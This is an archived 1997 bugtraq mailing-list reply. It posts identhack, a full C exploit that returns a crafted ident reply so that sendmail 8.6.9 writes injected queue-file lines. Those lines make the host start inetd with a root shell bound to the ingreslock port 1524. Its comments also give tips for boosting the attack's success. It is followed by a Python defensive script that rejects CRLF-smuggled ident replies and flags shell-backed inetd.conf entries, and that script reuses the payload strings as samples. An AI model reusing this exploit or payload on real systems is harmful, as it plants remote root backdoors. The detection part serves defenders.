
List:       bugtraq
Subject:    Re: Ingreslock Misconfiguration?
From:       Matt <panzer () DHP ! COM>
Date:       1997-01-28 6:52:21

Khelbin Sunvold <khelbin@CONNIX.COM> wrote:
> Just fooling around the other day on a box running ingres and I tried
> telnetting to port 1524 (ingreslock) and was surprised to be dropped into a
> root shell.

Perhaps they were running 8.6.9 also....  See below:
--
 -Matt (panzer@dhp.com)  --  DataHaven Project - http://www.dhp.com/
  "That which can never be enforced should not be prohibited."

/* identhack - sendmail identd hack.
 * Michael R. Widner - atreus (2/24/95)
 * <widner@uchicago.edu> <atreus@primus.com>
 *
 * Make sure you don't do anything evil with this.  That would be wrong.
 *
 * This is a real simple hacked identd that will return a string to abuse
 * the sendmail 8.6.9 identd problem.
 * NOTE:  This hack only works when sendmail queues up the message for
 * later delivery.  This depends on the configuration of sendmail.cf and
 * on the machine loading.  If you can do something to drag the machine to
 * its knees, then fire off this attack, you stand a much better chance of
 * success.
 *
 * This should compile ok with just [g]cc -o identhack identhack.c
 * Then add an appropriate entry in your inetd.conf and kill -HUP inetd.
 * ident  stream tcp  nowait  root  /tmp/identhack  in.identd
 * (identd port is 113, but hopefully your /etc/services knows that)
 *
 * Two noteworthy things:  Most people configure their sendmail.cf with
 * Og1 and Ou1 lines, setting the default user to bin.bin.  I see no way
 * to break root using this method if this is the case.  bin seems like the
 * best case scenario.
 */

#include <sys/types.h>
#include <sys/select.h>
#include <sys/time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* TIMEOUT is the number of seconds to wait before closing the connection if
 * the client doesn't provide the port pairs.
 */
#define TIMEOUT 120

/* OUTPUT_BUFFER_SIZE must hold the payload below plus the echoed request;
 * SOCKET_BUFFER_SIZE bounds what is read from the client.
 */
#define OUTPUT_BUFFER_SIZE      2048
#define SOCKET_BUFFER_SIZE      100

/* Started by inetd: the client connection is stdin (fd 0) and stdout (fd 1). */
int
main (void)
{
    fd_set fdset;
    struct timeval timeout;
    char buffer[OUTPUT_BUFFER_SIZE];
    char inbuffer[SOCKET_BUFFER_SIZE];
    int len;

    /* prepare to read ports */
    FD_ZERO (&fdset);
    FD_SET (0, &fdset);
    timeout.tv_sec = TIMEOUT;
    timeout.tv_usec = 0;

    /* read the "lport , rport" request from stdin, or give up after TIMEOUT */
    if (select (1, &fdset, NULL, NULL, &timeout) <= 0)
        exit (0);
    len = read (0, inbuffer, SOCKET_BUFFER_SIZE - 1);
    if (len <= 0)
        exit (0);
    inbuffer[len] = '\0';       /* read() does not NUL-terminate */

    /* Echo the request back the way a real identd would, then stuff the
     * "user name" field with CRLF-separated lines.  sendmail 8.6.9 copies the
     * reply into its queue control file unchecked, so each of these lines is
     * read back as a separate queue-file line.  The CRLF from the client's
     * request is echoed too; it sits before the first ':' and is ignored.
     */
    sprintf (buffer, "%s : USERID : UNIX : %s\r\n", inbuffer,
    "atreus)\r\nCroot\r\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nMlocal, \
P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\nR<\"|/bin/echo ingreslock stream tcp nowait root \
/bin/sh /bin/sh > /tmp/badfile\">\r\nR<\"|/usr/etc/inetd /tmp/badfile\">\r\n$rascii");

    /* The choice of commands to execute is virtually limitless.  I chose to
     * startup a copy of inetd with /bin/sh answering on the ingreslock port,
     * which is 1524.  I only chose this particular port because it's in most
     * /etc/services and sun inetd won't accept port numbers here, only
     * services defined in /etc/services or services.byname if you're using
     * yp.  Of course the syntax will vary by systems, as will the location of
     * inetd.  So an intruder must at least know what type of system he's
     * going after.
     */
    write (1, buffer, strlen (buffer));
    exit (0);
}
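The post turns on two things that are easy to check in code: an ident reply is a single-line protocol field, so a receiver that copies it unchecked into a line-oriented file (the sendmail 8.6.9 queue file identhack abuses) turns every embedded CRLF into a new record; and the payload leaves a recognisable artefact, an inetd.conf service whose server program is a shell. The following is an added example in Python, not code from the original message or from identhack.c. The sample replies and the inetd.conf excerpt are constructed here (the payload lines are copied from the identhack source above), and the SHELLS set is an assumption about which server paths to treat as a direct shell.

```python
"""Added example (Python; not code from the original post or identhack.c).

parse_ident_reply() is the check a receiver of ident replies needs: the
user-id field is defined as one line, so any embedded CR/LF is rejected
rather than copied into a line-oriented file, where each one would become
a new record (that unchecked copy is what identhack abuses).
injected_lines() shows the records such a copy would have created.
suspicious_inetd_entries() flags the artefact the payload leaves behind:
an inetd.conf service whose server program is a shell.  All sample data is
constructed; SHELLS is an assumption about which paths count as a shell.
"""
import re

# Constructed replies: a normal identd answer and the shape identhack emits.
BENIGN_REPLY = "6191 , 25 : USERID : UNIX : alice\r\n"
MALICIOUS_REPLY = (
    "6191 , 25 : USERID : UNIX : atreus)\r\nCroot\r\n"
    "Mprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\r\n"
    "R<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > /tmp/badfile\">\r\n"
    "R<\"|/usr/etc/inetd /tmp/badfile\">\r\n"
    "$rascii\r\n"
)


class IdentError(ValueError):
    """Raised for a reply that must not be trusted or stored."""


def parse_ident_reply(raw):
    """Parse one raw ident reply exactly as read from the socket.

    Returns (lport, rport, user).  Exactly one trailing CRLF is consumed; any
    control character left over means the peer smuggled extra lines into a
    single-line field, so the whole reply is rejected.
    """
    if not raw.endswith("\r\n"):
        raise IdentError("reply is not CRLF-terminated")
    body = raw[:-2]
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in body):
        raise IdentError("control character in ident reply")
    fields = [f.strip() for f in body.split(":", 3)]
    if len(fields) < 3:
        raise IdentError("malformed reply: %r" % body)
    ports, kind = fields[0], fields[1]
    if kind == "ERROR":
        raise IdentError("peer returned ERROR: %s" % fields[2])
    if kind != "USERID" or len(fields) != 4:
        raise IdentError("malformed reply: %r" % body)
    m = re.fullmatch(r"(\d+)\s*,\s*(\d+)", ports)
    if not m:
        raise IdentError("bad port pair: %r" % ports)
    lport, rport = int(m.group(1)), int(m.group(2))
    if not (0 < lport < 65536 and 0 < rport < 65536):
        raise IdentError("port out of range")
    user = fields[3]
    if not user or len(user) > 512:      # RFC 1413 caps the user-id at 512 octets
        raise IdentError("bad user-id length")
    return lport, rport, user


def reply_is_safe(raw):
    """True if parse_ident_reply() accepts the reply, False if it rejects it."""
    try:
        parse_ident_reply(raw)
        return True
    except IdentError:
        return False


def injected_lines(raw):
    """Records a receiver would create by writing the reply unchecked into a
    line-oriented file; everything after the first one is attacker-controlled."""
    return raw.rstrip("\r\n").split("\r\n")


# Constructed inetd.conf excerpt: two ordinary services plus the line that
# identhack's payload echoes into /tmp/badfile.
SAMPLE_INETD_CONF = """\
# service  type    proto  flags   user  server_path         args
ftp        stream  tcp    nowait  root  /usr/etc/in.ftpd    in.ftpd
ident      stream  tcp    nowait  root  /usr/etc/in.identd  in.identd
ingreslock stream  tcp    nowait  root  /bin/sh             /bin/sh
"""

SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash"}   # assumption


def suspicious_inetd_entries(conf_text):
    """Return (lineno, service, user, server) for each inetd.conf entry whose
    server program is itself a shell: every connection gets a shell as <user>,
    and as root that is a remote root backdoor."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        fields = line.split("#", 1)[0].split()
        if len(fields) < 6:
            continue
        service, _stype, _proto, _flags, user, server = fields[:6]
        if server in SHELLS:
            findings.append((lineno, service, user.split(".")[0], server))
    return findings


if __name__ == "__main__":
    print(parse_ident_reply(BENIGN_REPLY))
    print("malicious reply accepted?", reply_is_safe(MALICIOUS_REPLY))
    for rec in injected_lines(MALICIOUS_REPLY)[1:]:
        print("injected record:", rec)
    for f in suspicious_inetd_entries(SAMPLE_INETD_CONF):
        print("inetd backdoor: line %d service %s user %s server %s" % f)
```

Run stand-alone, the script accepts the benign reply, rejects the identhack-shaped one, lists the five queue-file records the unchecked copy would have produced (Croot, the two mailer lines, the two program recipients, plus the trailing $rascii), and reports the ingreslock entry in the sample inetd.conf. The same `suspicious_inetd_entries()` pass over a live /etc/inetd.conf (or a leftover /tmp/badfile) is a quick way to spot the backdoor Khelbin stumbled into.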


